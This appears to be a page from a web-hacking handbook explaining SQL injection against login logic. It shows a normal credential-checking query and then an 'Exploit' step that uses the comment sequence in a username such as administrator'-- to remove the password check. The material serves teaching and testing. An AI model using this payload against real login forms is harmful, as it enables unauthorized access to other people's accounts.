handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/2 - Subverting Application Logic.md
2024-08-31 01:07:22 +02:00

16 lines
537 B
Markdown

## Subverting Application logic
Consider an application that lets users log in with a username and password. If a user submits the
username wiener and the password bluecheese, the application checks the credentials by performing the following SQL query:
```
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
```
Exploit
1. Log in as any user with SQL comment sequence -- to remove password from the WHERE clause
```
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
```